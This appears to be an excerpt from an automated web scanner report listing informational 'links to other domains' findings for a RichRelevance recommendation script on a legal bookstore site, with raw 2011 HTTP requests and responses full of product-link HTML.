<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
homson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p11634476-159396S.JPG" alt="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159396&MaterialNumber=11634476&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
9&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Code, Rules and Forms, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22035157-160036S.JPG" alt="Bankruptcy Code, Rules and Forms, 2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160036&MaterialNumber=22035157&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160036" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
est.thomson.com%2Fproductdetail%2F506%2F11226777%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226777-506S.jpg" alt="Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=506&MaterialNumber=11226777&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn506" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=506&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F506%2F11226777%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy and Domestic Relations Manual, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40340361-159259S.JPG" alt="Bankruptcy and Domestic Relations Manual, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159259&MaterialNumber=40340361&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159259" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159259&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
160126&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160126%2F15307449%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Florida Business Laws Annotated, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p15307449-160126S.JPG" alt="Florida Business Laws Annotated, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160126&MaterialNumber=15307449&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160126" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=45f338fc-723b-4cac-d41a-b44be4d21aca&pti=1&pa=bottom&hpi=787&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160126&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160126%2F15307449%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.101. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848411250&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:06:41 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; Expires=Sun, 14-May-2079 23:20:48 GMT; Path=/
Set-Cookie: vihc=b73.1303848401787.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848401787.21158348%7C; Expires=Fri, 23-Apr-2021 20:06:41 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 18802

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
9&p=2158&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2158%2F13975614%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Tax Aspects of Bankruptcy Law and Practice, 3d"><img src="http://images.west.thomson.com/store/product_photos/p13975614-2158S.jpg" alt="Tax Aspects of Bankruptcy Law and Practice, 3d" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2158&MaterialNumber=13975614&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2158" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2158&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2158%2F13975614%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
est.thomson.com%2Fproductdetail%2F506%2F11226777%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226777-506S.jpg" alt="Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=506&MaterialNumber=11226777&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn506" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=PurchaseEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=506&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F506%2F11226777%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=144774&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F144774%2F13515946%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Norton Bankruptcy Law and Practice, 3d"><img src="http://images.west.thomson.com/store/product_photos/p13515946-144774S.JPG" alt="Norton Bankruptcy Law and Practice, 3d" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=144774&MaterialNumber=13515946&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn144774" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=144774&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F144774%2F13515946%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
fugy4lk3a&pg=179&p=2811&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2811%2F13512274%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Service, Lawyers ed."><img src="http://images.west.thomson.com/store/product_photos/13512272.jpg" alt="Bankruptcy Service, Lawyers ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2811&MaterialNumber=13512274&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2811" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2811&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2811%2F13512274%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
ugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Practice Handbook, 2d"><img src="http://images.west.thomson.com/store/product_photos/p13972135-2808S.jpg" alt="Bankruptcy Practice Handbook, 2d" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2808&MaterialNumber=13972135&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2808" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=2808&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2808%2F13972135%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Law Manual, 5th, 2010-2 ed."><img src="http://images.west.thomson.com/store/product_photos/p14862747-175579S.JPG" alt="Bankruptcy Law Manual, 5th, 2010-2 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=175579&MaterialNumber=14862747&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn175579" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=67a4690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=ClickEV&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=175579&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F175579%2F14862747%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.102. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848421638&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848401787.21158348%7C; pvihc=b73.1303848401787.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.46
Date: Tue, 26 Apr 2011 20:14:34 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848874533.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848874533.21158348%7C; Expires=Fri, 23-Apr-2021 20:14:34 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16933

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p12484463-160547S.JPG" alt="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160547&MaterialNumber=12484463&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160547" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=right&hpi=903&stn=BuyTogether&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160547&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy and Domestic Relations Manual, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40340361-159259S.JPG" alt="Bankruptcy and Domestic Relations Manual, 2010-2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159259&MaterialNumber=40340361&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159259" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=right&hpi=903&stn=BuyTogether&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159259&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
itle="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)"><img src="http://images.west.thomson.com/store/product_photos/p40888206-174615S.JPG" alt="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=174615&MaterialNumber=40888206&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn174615" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=174615&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F174615%2F40888206%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
oductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159383&MaterialNumber=40121151&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159383" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159383&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Mortgage and Asset Backed Securities Litigation Handbook"><img src="http://images.west.thomson.com/store/product_photos/p40711471-146955S.JPG" alt="Mortgage and Asset Backed Securities Litigation Handbook" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=146955&MaterialNumber=40711471&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn146955" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=b91923b9-9c4a-4abc-159b-1c4be4da1051&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=146955&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146955%2F40711471%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.103. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848219889&p=%7C162495&pt=%7Ccart_page.right%7Ccart_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43554%7C1%3Apromtype%253Dinternal&pref=http%3A%2F%2Fwest.thomson.com%2Fdefault.aspx&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
